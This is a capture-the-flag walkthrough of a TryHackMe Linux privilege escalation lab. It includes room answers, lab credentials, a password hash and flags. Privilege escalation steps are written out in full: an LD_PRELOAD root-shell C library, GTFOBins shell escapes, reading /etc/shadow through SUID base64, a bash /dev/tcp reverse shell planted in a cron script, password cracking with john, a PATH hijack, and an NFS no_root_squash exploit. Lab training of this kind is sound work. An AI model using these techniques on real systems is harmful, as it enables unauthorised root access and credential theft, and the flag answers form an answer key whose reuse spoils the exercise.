TryHackMe —Jr Penetration Tester — Privilege Escalation — Linux PrivEsc
Room 1 — Linux PrivEsc
Task 1 Introduction
Read only task !!
Task 2 What is Privilege Escalation?
Read only task !!
Task 3 Enumeration
Answer the questions below
Q 1. What is the hostname of the target system?
Ans. wade7363
Q 2. What is the Linux kernel version of the target system?
Ans. 3.13.0–24-generic
Q 3. What Linux is this?
Ans. Ubuntu 14.04 LTS
Q 4. What version of the Python language is installed on the system?
Ans. 2.7.6
Q 5. What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
Ans. CVE-2015–1328
Task 4 Automated Enumeration Tools
Read only task !!
Task 5 Privilege Escalation: Kernel Exploits
Statement :- Note: Launch the target machine attached to this task to follow along.
You can launch the target machine and access it directly from your browser.
Alternatively, you can access it over SSH with the low-privilege user credentials below:
Username: karen
Password: Password1
exploit search on google —
download the exploit to attacker machine start python3 http.server and transfer it to target machine using wget
hint* — find a folder for that all users have read write and execute access
after transferring the exploit to target machine use gcc <transferred file name> -o <name_exploit >
now we check id it will show karen
run exploit ./<file name>
check id we will get root rights.
Q 1. What is the content of the flag1.txt file?
Ans. THM-28392872729920
Task 6 Privilege Escalation: Sudo
Answer the questions below
Solution 1: — using https://gtfobins.github.io/
https://gtfobins.github.io/ is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.
As we know user karen has three programs on target system with sudo rights.
let’s check with nano.
Just search nano at https://gtfobins.github.io/ and we got function named as sudo, let’s check it.
now let’s run “sudo nano” on target machine
Now press ctrl+R
then ctrl+X to move on execute a command mode
now we are on execute a command mode
Now we ran command “reset; sh 1>&0 2>&0"
as mentioned in GTFOBins
Now we got the shell, let’s check user i’d.
let’s capture the flag.
Solution 2: — Following task info
The steps of this privilege escalation vector can be summarized as follows;
- Check for LD_PRELOAD (with the env_keep option)
- Write a simple C code compiled as a share object (.so extension) file
- Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file
The C code will simply spawn a root shell and can be written as follows;
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv(“LD_PRELOAD”);
setgid(0);
setuid(0);
system(“/bin/bash”);
}
We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters;
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
We need to run the program by specifying the LD_PRELOAD option, as follows;
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
This will result in a shell spawn with root privileges.
Q 1. How many programs can the user “karen” run on the target system with sudo rights?
Q 2. What is the content of the flag2.txt file?
Ans. THM-402028394
Q 3. How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
Ans. sudo nmap — interactive
Q 4. What is the hash of frank’s password?
Ans. $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1
Task 7 Privilege Escalation: SUID
Answer the questions below
Q 1. Which user shares the name of a great comic book writer?
Ans. gerryconway
Just use cat/etc/passwd and hit and tril method
Q 2. What is the password of user2?
Ans. Password1
Solution: — Now we need to do a privilege escalation
Now we know that we can check SUID funtions on GTFOBins
Much of Linux privilege controls rely on controlling the users and files interactions. This is done with permissions. By now, you know that files can have read, write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.
You will notice these files have an “s” bit set showing their special permission level.
find / -type f -perm -04000 -ls 2>/dev/null
will list files that have SUID or SGID bits set
let’s run this — find / -type f -perm -04000 -ls 2>/dev/null
We got that /usr/bin/base64 , we can use this for our privilege escalation
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
We got user2’s password hash, now crack it using john we got the password.
Q 3. What is the content of the flag3.txt file?
Ans. THM-3847834
Task 8 Privilege Escalation: Capabilities
Q 1. How many binaries have set capabilities?
Ans. 6
Q 2. What other binary can be used through its capabilities?
Ans. view
Q 3. What is the content of the flag4.txt file?
Ans. THM-9349843
Search capabilities for View
now run below cmd — /home/ubuntu/view -c ':pye import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
after this we will get a new shell
Task 9 Privilege Escalation: Cron Jobs
now modify the backup.sh cronjob to start reverse shell
bash -i >& /dev/tcp/10.10.137.81/4242 0>&1
Hint: — dont forget to provide execute +x rights to backup.sh
Now run a listener on attacker machine and wait for around 1 and 2 mins
Q 1 .How many cron jobs can you see on the target system?
Ans. 4
Q 2. What is the content of the flag5.txt file?
Ans. THM-383000283
Q 3. What is Matt’s password?
Ans. 123456
cat /etc/shadow — we got the password hash
now using John we can crack it.
sudo john p1.txt — wordlist=/usr/share/wordlists/rockyou.txt
sudo john — show p1.txt
Task 10 Privilege Escalation: PATH
be sure you can answer the questions below before trying this.
- What folders are located under $PATH
- Does your current user have write privileges for any of these folders?
- Can you modify $PATH?
- Is there a script/application you can start that will be affected by this vulnerability?
find / -writable 2>/dev/null | cut -d “/” -f 2 | sort -u
$ nano thm
$ echo “/bin/bash” > thm
$ chmod 777 thm
$ ls -l thm
$ ./thm
Answer the questions below
Q 1. What is the odd folder you have write access for?
Ans. /home/murdoch
Q 2. Exploit the $PATH vulnerability to read the content of the flag6.txt file.
Ans. read only!!
Q 3. What is the content of the flag6.txt file?
Ans. THM-736628929
Task 11 Privilege Escalation: NFS
Answer the questions below
Q 1. How many mountable shares can you identify on the target system?
Ans. 3
Q 2. How many shares have the “no_root_squash” option enabled?
Ans. 3
Q 3. What is the content of the flag7.txt file?
Ans. THM-89384012
Solution: — The critical element for this privilege escalation vector is the “no_root_squash” option you can see above. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.
We will start by enumerating mountable shares from our attacking machine.
We will mount one of the “no_root_squash” shares to our attacking machine and start building our executable.
sudo mount -o rw 10.10.208.235:/home/ubuntu/sharedfolder /tmp/Share_at_target_machine/
Once we compile the code we will set the SUID bit.
sudo gcc nfs.c -o nfs -w
we will see below that both files (nfs.c and nfs are present on the target system. We have worked on the mounted share so there was no need to transfer them).
Notice the nfs executable has the SUID bit set on the target system and runs with root privileges.
Task 12 Capstone Challenge
now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.
Use whatever we learn till now in this room.
Answer the questions below
Q 1. What is the content of the flag1.txt file?
Ans. THM-42**871**20544
Q 2. What is the content of the flag2.txt file?
Ans. THM-16**247823**238
If any one need any explanation or help please message!!
thank you !! happy hacking!!